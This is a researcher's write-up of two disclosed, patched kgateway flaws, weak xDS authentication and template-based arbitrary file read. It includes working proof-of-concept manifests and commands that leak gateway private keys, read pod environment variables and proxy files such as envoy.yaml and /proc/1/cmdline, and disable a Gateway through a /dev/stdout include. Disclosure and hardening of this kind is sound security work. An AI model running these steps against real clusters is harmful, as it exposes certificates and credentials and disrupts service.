
Ricardo Katz


The kgateway vulnerabilities explained (and why I disagree on its score!)

NOTE ⚠️: This article is written purely for research and educational purposes to help improve security across the ecosystem, and represents my self-evaluation of our risk assessment process for kgateway. kgateway is an excellent Gateway API implementation, and I have great respect for the developers and their work on this project. The vulnerabilities discussed here have been responsibly disclosed and patched. Views expressed are my own and do not necessarily reflect those of my employer.


Acknowledgments

Starting with acknowledgments:

  • My wife, who was very patient with me while I was spending a lot of time investigating this
  • My team, who gave me time to conduct this research and kept motivating me to help improve the open source ecosystem
  • My friends Carlos, Adolfo and James
  • Ingress NGINX maintainers (past and current): I know these are hard times, but you rock and have maintained a critical piece for a long time
  • kgateway maintainers (especially John and Josh), who took the time to understand the problem, acknowledge it, and fix it.

Some context

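I recently discovered two vulnerabilities in kgateway that have been publicly disclosed:

  • GHSA-4766-x535-jw3r / CVE-2025-64323: weak authentication on the control plane
  • GHSA-5pmx-7r6r-wfqq: arbitrary file read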

These findings were discovered unintentionally, while I was researching how to extend and use kgateway for a personal idea.

For those unfamiliar, kgateway is a CNCF Sandbox project that implements a Kubernetes Gateway API controller, and is one of many implementations backed by Envoy Proxy.

Additionally, the project is leaning towards supporting its own proxy implementation called agentgateway, more focused on AI traffic and implemented in Rust.

Why Envoy-based Implementations?

One of the most appealing features of Envoy is its support for dynamic configuration, based on a control plane/data plane architecture.

This architecture allows a single controller to reconcile all Gateway API resources and generate a configuration that is exposed on a network endpoint via Envoy's well-known xDS API, using a Go library provided by the Envoy project. An Envoy proxy can then connect to this control plane endpoint and fetch its own configuration.

This makes it much easier for implementations to separate concerns between the control plane, which connects to the Kubernetes cluster to watch and reconcile resources, and the data plane, which should never have direct access to the Kubernetes API server. It also helps avoid problems we had in the past with Ingress NGINX and its template-based nginx.conf generation.

In a typical Gateway API deployment with an Envoy-based implementation, the controller runs in one namespace, a Gateway is created in an infrastructure namespace, and the user application lives in a different namespace.


The weak authentication problem

This is related to GHSA-4766-x535-jw3r / CVE-2025-64323

During my research, one of my goals was to attach my own proxy to kgateway, to see if I could rely on its reconciliation logic while using a custom backend. This is actually supported.

I realized that the kgateway control plane was exposed to proxies via the kgateway service in the kgateway-system namespace, on port 9977.

My starting point was to figure out if I could use grpcurl to fetch the configuration directly from the kgateway control plane. After consulting ChatGPT for the correct syntax, I arrived at something like this (note: the command is incomplete):

grpcurl -plaintext  kgateway.kgateway-system:9977 \
   envoy.service.discovery.v3.AggregatedDiscoveryService/StreamAggregatedResources

This service can be used to stream configurations to Envoy, but you need to specify which type you want (Listener? Routes?).

An Envoy proxy also needs to send its metadata to the control plane, so the control plane can decide which configuration to send back. kgateway used this metadata as its authentication mechanism.

Note: agentgateway used a similar mechanism to get its configuration from the kgateway control plane. The main difference is that agentgateway relies on a much smaller model.

After some investigation, I discovered that by passing the right data, the control plane would return the requested configuration:

{
  "node": {
    "id": "$GATEWAY_POD.$GATEWAY_NAMESPACE",
    "cluster": "$GATEWAY_NAME.$GATEWAY_NAMESPACE",
    "metadata": {
      "role": "kgateway-kube-gateway-api~$GATEWAY_NAMESPACE~$GATEWAY_NAME"
    }
  },
  "typeUrl": "$ENVOY_TYPE"
}

The request requires these replacements:

  • $GATEWAY_NAME and $GATEWAY_NAMESPACE are the Gateway resource details. Users with permission to create an HTTPRoute would already have this information (required for the parentRef field)
  • $GATEWAY_POD is the actual pod name of the Envoy proxy. This is the only piece of information that might be challenging to obtain, which led to discovering the other vulnerability
  • $ENVOY_TYPE is the type of configuration to stream. Common types include:
type.googleapis.com/envoy.config.listener.v3.Listener #<- This contains certificates!
type.googleapis.com/envoy.config.route.v3.RouteConfiguration
type.googleapis.com/envoy.config.cluster.v3.Cluster
type.googleapis.com/envoy.config.endpoint.v3.ClusterLoadAssignment
type.googleapis.com/envoy.extensions.transport_sockets.tls.v3.Secret
type.googleapis.com/envoy.config.listener.v3.FilterChain
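
As a minimal sketch of how the request above is put together, the snippet below builds the same JSON body from the four values. The helper name build_discovery_request is hypothetical and not part of kgateway or Envoy; the field layout and the role format are copied from the request shown earlier, and the sample values are the ones used in this article.

```python
import json

# Type URL for Envoy listeners, taken from the list above.
LISTENER_TYPE = "type.googleapis.com/envoy.config.listener.v3.Listener"


def build_discovery_request(gateway_name, gateway_namespace, gateway_pod, type_url):
    """Return the discovery request body as a dict (hypothetical helper)."""
    return {
        "node": {
            # Pod name and namespace of the Envoy proxy.
            "id": f"{gateway_pod}.{gateway_namespace}",
            # Gateway resource name and namespace.
            "cluster": f"{gateway_name}.{gateway_namespace}",
            "metadata": {
                # Role string in the format shown in the request above.
                "role": f"kgateway-kube-gateway-api~{gateway_namespace}~{gateway_name}"
            },
        },
        "typeUrl": type_url,
    }


request = build_discovery_request(
    gateway_name="gateway",
    gateway_namespace="infra",
    gateway_pod="gateway-678d4cf544-h9bs2",
    type_url=LISTENER_TYPE,
)
# The printed JSON is what would be passed to grpcurl with -d.
print(json.dumps(request))
```

Every value in the body is either public to anyone who can create an HTTPRoute or, in the case of the pod name, obtainable by other means, which is why it cannot serve as a credential.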

Since the only additional information needed for authentication is the Gateway Pod name, once obtained, an attacker can create a Pod/Job with the manifest below to expose gateway certificates (which they should not have access to, as certificates are managed by the Gateway owner). In this example, I've replaced GATEWAY_NAME, GATEWAY_NAMESPACE, GATEWAY_POD, and ENVOY_TYPE with the appropriate values:

apiVersion: batch/v1
kind: Job
metadata:
  name: leak
  namespace: unprivileged
spec:
  backoffLimit: 0
  template:
    spec:
      restartPolicy: Never
      containers:
      - name: grpcurl-runner
        image: mirror.gcr.io/fedora:43
        command: ["/bin/bash", "-c"]
        args:
          - |
            set -e
            rpm -Uvh https://github.com/fullstorydev/grpcurl/releases/download/v1.9.3/grpcurl_1.9.3_linux_amd64.rpm
            cat > /script.sh <<'EOF'
            #!/bin/bash
            until [ -s /output.txt ]; do
            sleep 1
            grpcurl -plaintext -d '{"node": {"id": "gateway-678d4cf544-h9bs2.infra","cluster": "gateway.infra","metadata": {"role": "kgateway-kube-gateway-api~infra~gateway"}},"typeUrl": "type.googleapis.com/envoy.config.listener.v3.Listener"}' kgateway.kgateway-system:9977 envoy.service.discovery.v3.AggregatedDiscoveryService/StreamAggregatedResources > /output.txt
            done
            cat /output.txt
            EOF
            chmod +x /script.sh
            /script.sh

Checking the logs of this Job reveals the certificate's private key:

"privateKey": {
   "inlineBytes": "CERTIFICATE_PRIVATE_KEY"
}

Getting the Pod name

I needed the Pod name to be able to authenticate. kgateway provides a Custom Resource called TrafficPolicy that allows a user to apply policies such as rate limiting, authentication, etc.

The problem with TrafficPolicy is that its transformations can add headers to requests and responses, and these transformations are template-based and can read the proxy's environment variables.

This feature has legitimate uses, such as exposing the availability zone of a proxy, but it can also be used to read the HOSTNAME environment variable, which contains the Pod name.

For example, a user could create the following resources in their unprivileged namespace:

apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
  name: my-app
  namespace: unprivileged
spec:
  hostnames:
  - app.tld
  parentRefs:
  - group: gateway.networking.k8s.io
    kind: Gateway
    name: gateway
    namespace: infra
  rules:
  - backendRefs:
    - group: ""
      kind: Service
      name: my-app
      port: 80
      weight: 1
    matches:
    - path:
        type: PathPrefix
        value: /
---
apiVersion: gateway.kgateway.dev/v1alpha1
kind: TrafficPolicy
metadata:
  name: transformation
  namespace: unprivileged
spec:
  targetRefs:
  - group: gateway.networking.k8s.io
    kind: HTTPRoute
    name: my-app
  transformation:
    response:
      add:
      - name: pod-name
        value: '{{ env("HOSTNAME") }}'

A simple cURL request to the app is sufficient to retrieve the Gateway pod name:

$ curl --output /dev/null -I -s -w '%header{pod-name}' http://app.tld
gateway-678d4cf544-h9bs2

The pod name can then be used to exploit the weak authentication vulnerability.

About the score of this vulnerability

Given that:

  • The vulnerability requires authenticated Kubernetes cluster access with permissions to create HTTPRoute and TrafficPolicy resources, meaning Network Attack Vector (AV:N) and Low Privileges required (PR:L)
  • The Attack complexity is low (AC:L)
  • The Confidentiality impact is high (C:H)

Based on these factors, the CVSS score for this vulnerability is 6.5, which classifies it as "Medium" severity.

Note: While access to TrafficPolicy and HTTPRoute should be restricted through proper RBAC policies, the low barrier to exploitation for users with these permissions remains a significant security concern.


The arbitrary file read problem

This is related to GHSA-5pmx-7r6r-wfqq

While trying to figure out a way to expose the Pod name, I noticed that the kgateway documentation states that "templates are powered by v3.4 of the Inja template engine".

I decided to investigate what other capabilities Inja offered.

Inja allows including other files as templates, so I decided to test this feature by modifying my TrafficPolicy:

apiVersion: gateway.kgateway.dev/v1alpha1
kind: TrafficPolicy
metadata:
  name: transformation
  namespace: unprivileged
spec:
  targetRefs:
  - group: gateway.networking.k8s.io
    kind: HTTPRoute
    name: my-app
  transformation:
    response:
      body:
        parseAs: AsString
        value: '{% include "/etc/envoy/envoy.yaml" %}'

Now, when I call my app with curl http://app.tld, I get the full Envoy configuration.

At first, someone might think of extracting the Kubernetes service account token from /var/run/secrets/kubernetes.io/serviceaccount/token, but kgateway follows good security practices by not mounting Kubernetes service account tokens on the proxies.

However, an attacker could still read /proc/1/cmdline to see how Envoy is started and potentially obtain credentials for the control plane.

The fix for the weak authentication issue added token-based authentication as part of this PR, and the new token is mounted at /var/run/secrets/tokens/xds-token.

These are two separate vulnerabilities, but they compound: if the arbitrary file read had still been exploitable after the weak authentication fix was deployed, an attacker could have read this token and used it to fetch configurations from the control plane.

Another concern is that an attacker could set the include path to /dev/stdout, which blocks all Envoy reads and makes the Gateway unavailable, creating both a confidentiality and availability issue.

About the score of this vulnerability

Given that:

  • The vulnerability requires authenticated Kubernetes cluster access with permissions to create HTTPRoute and TrafficPolicy resources, meaning Network Attack Vector (AV:N) and Low Privileges required (PR:L)
  • The Attack complexity is low (AC:L)
  • The Confidentiality impact is high (C:H)
  • The Availability impact is high (A:H)

Based on these factors, the CVSS score for this vulnerability is 8.1, which classifies it as "High" severity.
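
To make the arithmetic behind both scores reproducible, here is a minimal sketch of the CVSS base score formula. It rests on assumptions the text does not state: CVSS v3.1, no user interaction (UI:N), unchanged scope (S:U), and no integrity impact (I:N). The function names are hypothetical, and only the scope-unchanged case is handled.

```python
import math

# CVSS v3.1 metric weights (Privileges Required values are for unchanged scope).
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
PR = {"N": 0.85, "L": 0.62, "H": 0.27}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(value):
    """Round up to one decimal place, as defined by the CVSS v3.1 specification."""
    scaled = int(round(value * 100000))
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector):
    """Compute the base score for a vector such as 'AV:N/AC:L/...' with S:U."""
    metrics = dict(part.split(":") for part in vector.split("/"))
    if metrics["S"] != "U":
        raise ValueError("this sketch only handles unchanged scope (S:U)")
    iss = 1 - (1 - CIA[metrics["C"]]) * (1 - CIA[metrics["I"]]) * (1 - CIA[metrics["A"]])
    impact = 6.42 * iss
    exploitability = (
        8.22 * AV[metrics["AV"]] * AC[metrics["AC"]] * PR[metrics["PR"]] * UI[metrics["UI"]]
    )
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


# Assumed full vectors; UI, S and I are not given in the text.
weak_auth = base_score("AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N")
file_read = base_score("AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H")
print(weak_auth, file_read)  # 6.5 8.1
```

Under these assumptions the two vectors differ only in the Availability metric, and that single change is what moves the result from "Medium" to "High".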


Best Practices for Security

Recommended steps to help reduce the risks of discovered (and undiscovered) vulnerabilities:

  • Always upgrade - Apply security updates regardless of whether vulnerabilities are tagged as "Low" or "Medium".
  • Implement least privilege - Limit user access to only the resources they need. If users don't require access to resources like TrafficPolicy, don't grant it. If they do, ensure proper auditing is in place.
  • Use Network Policies - While kgateway manages part of the Gateway lifecycle, you can still create NetworkPolicies to restrict control plane access to only Gateways in trusted namespaces.
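
As a rough sketch of the NetworkPolicy idea, the snippet below generates a manifest that only admits traffic to the control plane port from selected namespaces. The helper name, the policy name restrict-xds, and the app: kgateway pod label are hypothetical and must be checked against the labels in your installation; the namespace kgateway-system and port 9977 come from this article. It relies on the kubernetes.io/metadata.name label that Kubernetes sets on every namespace.

```python
import json


def xds_network_policy(control_plane_ns, trusted_namespaces, pod_labels, xds_port=9977):
    """Build a NetworkPolicy manifest as a dict (hypothetical helper)."""
    return {
        "apiVersion": "networking.k8s.io/v1",
        "kind": "NetworkPolicy",
        "metadata": {"name": "restrict-xds", "namespace": control_plane_ns},
        "spec": {
            # Selects the control plane pods; the labels are an assumption.
            "podSelector": {"matchLabels": pod_labels},
            "policyTypes": ["Ingress"],
            "ingress": [
                {
                    # One namespace selector per trusted Gateway namespace.
                    "from": [
                        {
                            "namespaceSelector": {
                                "matchLabels": {"kubernetes.io/metadata.name": ns}
                            }
                        }
                        for ns in trusted_namespaces
                    ],
                    "ports": [{"protocol": "TCP", "port": xds_port}],
                }
            ],
        },
    }


policy = xds_network_policy(
    control_plane_ns="kgateway-system",
    trusted_namespaces=["infra"],
    pod_labels={"app": "kgateway"},  # hypothetical label
)
# kubectl accepts JSON manifests, so this output can be piped to `kubectl apply -f -`.
print(json.dumps(policy, indent=2))
```

Two caveats apply. Once a policy selects the control plane pods, any other ingress they need (for example metrics scraping) is denied unless further rules are added. NetworkPolicies also only take effect when the cluster's network plugin enforces them.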
